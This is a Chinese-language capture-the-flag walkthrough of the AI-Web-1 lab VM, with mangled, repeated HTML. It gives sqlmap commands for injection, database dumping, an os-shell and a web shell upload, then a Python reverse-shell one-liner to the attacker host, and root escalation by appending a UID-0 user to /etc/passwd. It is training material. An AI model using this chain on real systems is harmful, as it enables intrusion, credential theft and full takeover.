AI Web1 靶场渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 网络扫描<\/h3>

使用 arp-scan<\/code> 和 nmap<\/code> 进行初始扫描<\/li>
确认目标IP: 192.168.78.145<\/code><\/li>

开放端口: 80<\/code> (HTTP)<\/li>
<\/ul>
1.2 目录扫描<\/h3>

使用 dirsearch<\/code> 扫描Web目录<\/li>
发现关键文件\/目录:

\/robots.txt<\/code>

暴露目录: \/m3diNf0\/<\/code> 和 \/se3reTdir777\/uploads\/<\/code><\/li>
<\/ul>
<\/li>
\/m3diNf0\/info.php<\/code> (phpinfo页面)

获取网站绝对路径: \/home\/www\/html\/web1x443290o2sdf92213\/m3diNf0\/info.php<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
2. 漏洞发现与利用<\/h2>
2.1 SQL注入漏洞<\/h3>

发现注入点: \/se3reTdir777\/<\/code> 的输入表单<\/li>
注入测试:

输入 1<\/code> → 正常返回<\/li>
输入 1'<\/code> → 报错<\/li>
输入 1"%23<\/code> → 成功返回<\/li>
<\/ul>
<\/li>
确认注入类型: 字符型，双引号闭合<\/li>
<\/ul>
2.2 使用sqlmap自动化利用<\/h3>

保存请求为文件 1.txt<\/code><\/li>
检测注入:
sqlmap -r 1.txt
<\/span><\/span><\/code><\/pre><\/li>
获取数据库信息:
sqlmap -r 1.txt --dbs
<\/span><\/span><\/code><\/pre><\/li>
获取表信息:
sqlmap -r 1.txt -D aiweb1 --tables
<\/span><\/span><\/code><\/pre><\/li>
获取表数据:
sqlmap -r 1.txt -D aiweb1 -T systemUser --dump
<\/span><\/span><\/code><\/pre><\/li>
解密获取的密码(Base64):

t00r:FakeUserPassw0rd<\/li>
aiweb1pwn:MyEvilPass_f908sdaf9_sadfasf0sa<\/li>
u3er:N0tThis0neAls0<\/li>
<\/ul>
<\/li>
<\/ol>
2.3 获取Web Shell<\/h3>

使用sqlmap的os-shell功能:
sqlmap -u "http:\/\/192.168.78.145\/se3reTdir777\/index.php"<\/span> --data "uid=1&Operation=Submit"<\/span> --level=<\/span>3<\/span> --os-shell
<\/span><\/span><\/code><\/pre><\/li>
上传Web Shell:
sqlmap -u "http:\/\/192.168.78.145\/se3reTdir777\/index.php"<\/span> --data "uid=1&Operation=Submit"<\/span> --file-write hanhan.php --file-dest \/home\/www\/html\/web1x443290o2sdf92213\/se3reTdir777\/uploads\/hanhan.php
<\/span><\/span><\/code><\/pre><\/li>
使用冰蝎连接:

连接URL: http:\/\/192.168.78.145\/se3reTdir777\/uploads\/hanhan.php<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
3. 权限提升<\/h2>
3.1 反弹Shell<\/h3>

攻击机监听:
nc -lvvp 9999<\/span>
<\/span><\/span><\/code><\/pre><\/li>
靶机执行(通过冰蝎终端):
export RHOST=<\/span>"192.168.78.128"<\/span>;export RPORT=<\/span>9999;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("\/bin\/sh")'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
提升为交互式Shell:
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 添加特权用户<\/h3>

生成加密密码:
perl -le 'print crypt("123456","123456")'<\/span>
<\/span><\/span><\/code><\/pre>输出: 12tir.zIbWQ3c<\/code><\/li>
编辑\/etc\/passwd:
echo "hanh:12tir.zIbWQ3c:0:0:root:\/root:\/bin\/bash"<\/span> >> \/etc\/passwd
<\/span><\/span><\/code><\/pre><\/li>
切换用户:
su hanh
<\/span><\/span><\/code><\/pre>密码: 123456<\/code><\/li>
<\/ol>
4. 获取Flag<\/h2>

成功读取flag:

flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}<\/code><\/li>
<\/ul>
关键点总结<\/h2>

目录扫描发现敏感信息(robots.txt)<\/li>
SQL注入点的发现与利用<\/li>
sqlmap的高级用法(--os-shell和文件上传)<\/li>
反弹Shell的技巧<\/li>
通过修改\/etc\/passwd提权的方法<\/li>
交互式Shell的获取方法<\/li>
<\/ol>

AI Web1 靶场渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞发现与利用<\/h2>

3. 权限提升<\/h2>

关键点总结<\/h2> 目录扫描发现敏感信息(robots.txt)<\/li> SQL注入点的发现与利用<\/li> sqlmap的高级用法(--os-shell和文件上传)<\/li> 反弹Shell的技巧<\/li> 通过修改\/etc\/passwd提权的方法<\/li> 交互式Shell的获取方法<\/li> <\/ol>

关键点总结<\/h2>

目录扫描发现敏感信息(robots.txt)<\/li>
SQL注入点的发现与利用<\/li>
sqlmap的高级用法(--os-shell和文件上传)<\/li>
反弹Shell的技巧<\/li>
通过修改\/etc\/passwd提权的方法<\/li>
交互式Shell的获取方法<\/li> <\/ol>